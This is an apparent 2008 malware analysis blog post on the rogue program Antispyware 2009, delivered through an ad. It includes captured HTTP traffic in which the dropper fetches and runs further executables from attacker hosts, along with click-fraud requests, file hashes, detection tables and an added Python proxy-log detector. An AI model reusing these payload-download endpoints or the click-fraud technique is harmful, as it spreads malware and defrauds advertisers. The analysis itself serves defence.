Rogue Antispyware 2009 served through beedly.us ADS
Today, while browsing the beedly.us website, I saw a suspicious ad linking to the malicious website proantispyware2009(dot)com, so I started to analyze the link; below are the results:
After clicking on the ad I was redirected to a new sub-domain:
and, viewing the HTML code, we can see that clicking the "remove" button prompts a download of a file named setup_246_3777_.exe, which is the real setup file of the rogue security software.
Report Generated 13.11.2008 at 20.33.51 (GMT 1)
Filename: setup_246_3777_.exe
File size: 112 KB
MD5 Hash: E9339F9045368947789EC70739DE4B21
SHA1 Hash: DC7B37C1158F5AD4D3E092AFCADE58A5E3FC145B
Application Type: Executable (EXE) 32bit
Detection Rate: 0 on 23
After I executed the .EXE file, new traffic appeared:
```
GET /get/?type=scanner&pin=246&lnd=3777 HTTP/1.1
User-Agent: Installer
Host: dl.storage-antispyware.com

HTTP/1.1 200 OK
Content-Disposition: attachment; filename=scanner_246_3777_.exe
Content-Transfer-Encoding: binary
```
From this traffic we can see that a new file is downloaded:
```
filename=scanner_246_3777_.exe
```
It is the installer for the rogue security software Antispyware 2009!
Report Generated 13.11.2008 at 21.24.07 (GMT 1)
Filename: scanner_246_3777_.exe
File size: 811 KB
MD5 Hash: E0F855C6C5FC93F0A8ED1FE9E702E492
SHA1 Hash: 77ACC5822A5EBD734075BDF4752EC6F10617050F
Detection Rate: 9 on 23
Antivirus Result
a-squared Trojan.Fakealert.ads.1!IK
Avira AntiVir TR/Fakealert.ads.1
Avast Win32:Spyware-gen [Trj] (0)
AVG Trojan horse SHeur.CQDP
BitDefender Trojan.FakeAlert.AKQ
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Win32:Spyware-gen [Trj] B
IkarusT3 Trojan.Fakealert.ads.1
Kaspersky –
McAfee PWCrack-Winspy trojan
NOD32 v3 –
Norman Aggressive commersial W32/AntiVirus2008.TB ()
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –
Next, a new .EXE was downloaded and executed on my system:
```
GET /mxlivemedia/get_file.php HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141

GET /mxlivemedia/multi/16.exe HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141
```
and the file is:
```
Location: multi/16.exe
```
Report Generated 13.11.2008 at 20.39.42 (GMT 1)
Filename: 16.exe
File size: 598 KB
MD5 Hash: 9A785CF7901E348C1840925EB5E0C5CC
SHA1 Hash: 189EEA8FB44360C5E4011BB471D7F1D8F7B3F7AC
Detection Rate: 2 on 23
Antivirus Result
a-squared –
Avira AntiVir –
Avast –
AVG –
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA –
IkarusT3 –
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee –
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –
After 16.exe was executed, new traffic to new hosts appeared:
```
GET /stat.php?func=install&pid=246&ip=127.0.0.1&landing=3777
Host: int.vbvyu.com

GET /smb/nsi_install.php?inst_result=success&hwid=xxx
Host: a2.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)

GET /bc/nsi_install.php?aff_id=mxlivemedia&inst_result=success&id=xxx
Host: a1.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)
```
Afterwards, IEXPLORE.EXE was launched as a hidden process and the malware started clicking the ad links in the background (click fraud):
```
GET /servlet/ajrotator/246392/0/vh?z=icm&dim=186262
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html
Host: rotator.its.adjuggler.com

GET /servlet/ajrotator/7678/0/vh?z=ast&ch=7108&dim=56
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html
Host: servedby.topqualityads.net

GET /bc/ads/300x250/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com

GET /bc/ads/160x600/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com

GET /bc/ads/728x90/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php

GET /bc/ads/728x90/48dcc730ea0ce.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com

POST /bc/123kah.php
Host: a1.mxlivemedia.com
```
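The captures above show three patterns a defender can look for in proxy logs: executable downloads fetched by a non-browser User-Agent ("Installer", "NSISDL/..."), install-confirmation beacons (func=install, inst_result=success), and bursts of ad-creative requests that all carry the same Referer page. The script below is an added example, not part of the original post; it runs a small rule set over a constructed proxy log whose format (one request per line with ua=, ref= and cd= fields) is an assumption, and whose lines are modelled on the requests seen in this analysis.

```python
"""Flag the HTTP patterns from the Antispyware 2009 analysis in a proxy log.

Added example; the log format and sample lines are constructed for the demo.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed sample log (assumed format): ts client method url ua= ref= cd=
SAMPLE_LOG = """\
2008-11-13T20:34:10 10.0.0.5 GET http://dl.storage-antispyware.com/get/?type=scanner&pin=246&lnd=3777 ua="Installer" ref="" cd="attachment; filename=scanner_246_3777_.exe"
2008-11-13T20:35:02 10.0.0.5 GET http://85.92.157.141/mxlivemedia/multi/16.exe ua="Installer" ref="" cd=""
2008-11-13T20:40:15 10.0.0.5 GET http://int.vbvyu.com/stat.php?func=install&pid=246&ip=127.0.0.1&landing=3777 ua="NSISDL/1.2 (Mozilla)" ref="" cd=""
2008-11-13T20:40:16 10.0.0.5 GET http://a2.mxlivemedia.com/smb/nsi_install.php?inst_result=success&hwid=xxx ua="NSISDL/1.2 (Mozilla)" ref="" cd=""
2008-11-13T20:41:00 10.0.0.5 GET http://a1.mxlivemedia.com/bc/ads/300x250/48e220b3afd5f.html ua="Mozilla/4.0 (compatible; MSIE 7.0)" ref="http://a1.mxlivemedia.com/bc/123kah.php" cd=""
2008-11-13T20:41:01 10.0.0.5 GET http://a1.mxlivemedia.com/bc/ads/160x600/48e220b3afd5f.html ua="Mozilla/4.0 (compatible; MSIE 7.0)" ref="http://a1.mxlivemedia.com/bc/123kah.php" cd=""
2008-11-13T20:41:01 10.0.0.5 GET http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html ua="Mozilla/4.0 (compatible; MSIE 7.0)" ref="http://a1.mxlivemedia.com/bc/123kah.php" cd=""
2008-11-13T20:45:00 10.0.0.7 GET http://example.org/index.html ua="Mozilla/4.0 (compatible; MSIE 7.0)" ref="" cd=""
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+)'
    r' ua="(?P<ua>[^"]*)" ref="(?P<ref>[^"]*)" cd="(?P<cd>[^"]*)"$'
)

# User-Agent prefixes used by the downloader stages in the post.
INSTALLER_UAS = ("Installer", "NSISDL/")
# Ad creative paths like /ads/300x250/<id>.html.
AD_CREATIVE_RE = re.compile(r"/ads/\d+x\d+/")


def parse_log(text):
    """Return one dict per well-formed log line; malformed lines are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def is_installer_ua(ua):
    return any(ua.startswith(prefix) for prefix in INSTALLER_UAS)


def is_exe_download(rec):
    """True if the URL path or the Content-Disposition names an .exe."""
    path = urlparse(rec["url"]).path.lower()
    cd = rec["cd"].lower()
    return path.endswith(".exe") or ("attachment" in cd and ".exe" in cd)


def is_install_beacon(rec):
    """True for install-confirmation query strings (inst_result=, func=install)."""
    qs = parse_qs(urlparse(rec["url"]).query)
    return "inst_result" in qs or qs.get("func") == ["install"]


def detect(records, min_creatives=3):
    """Return (rule, client, indicator) tuples for every matching record."""
    findings = []
    creatives = defaultdict(list)  # (client, referer) -> ad creative URLs
    for rec in records:
        if is_installer_ua(rec["ua"]) and is_exe_download(rec):
            findings.append(("exe-by-installer-ua", rec["client"], rec["url"]))
        if is_install_beacon(rec):
            findings.append(("install-beacon", rec["client"], rec["url"]))
        if rec["ref"] and AD_CREATIVE_RE.search(urlparse(rec["url"]).path):
            creatives[(rec["client"], rec["ref"])].append(rec["url"])
    # Several creatives fetched under one Referer page is the clicker signature.
    for (client, ref), urls in creatives.items():
        if len(urls) >= min_creatives:
            findings.append(("ad-creative-burst", client, ref))
    return findings


if __name__ == "__main__":
    for rule, client, indicator in detect(parse_log(SAMPLE_LOG)):
        print(f"{rule:22} {client:10} {indicator}")
```

The beacon rule deliberately ignores the User-Agent, because the stat.php request in the capture carries none; the burst threshold (three creatives under one Referer) is a demo value to tune against real traffic.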
Afterwards, new files were created in system32:
Report Generated 13.11.2008 at 20.50.00 (GMT 1)
Filename: msclgkhvhfp.dll
File size: 173 KB
MD5 Hash: 8532E92178E9126A151E31683D896C31
SHA1 Hash: 088E2728D8D7D5E185AF231F54D917605F7CED24
Detection Rate: 6 on 23
Antivirus Result
a-squared Generic.Adw.Rotator!IK
Avira AntiVir –
Avast –
AVG –
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Trojan-Clicker.Win32.Agent.evi A
IkarusT3 Generic.Adw.Rotator
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee AdClicker-GI trojan
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus –
Sophos –
TrendMicro –
VBA32 –
VirusBuster –
Below are the IEXPLORE.EXE connections:
And finally the window of the rogue security software Antispyware 2009 appeared on the screen:
I have created a small summary of the activity observed during this analysis:
After reading the SophosLabs article that steve posted in the comments, I analyzed the file setup_246_3777_.exe with OllyDbg; below are some images:
Original Entry Point:
Now, if I follow the address CALL 0040116D, I arrive at the code shown in the image below:
And if I then follow the address MOV EDX,00405DEC, I arrive at the code shown in the image below, which is full of zero bytes (similar to the SophosLabs analysis):
And finally, below, I have added some images of the fake alerts shown by Pro Antispyware 2009:
Make sure not to fall for this scam. If your computer is infected with Antispyware 2009, it is recommended to remove it immediately and to scan your system with NoVirusThanks Malware Remover.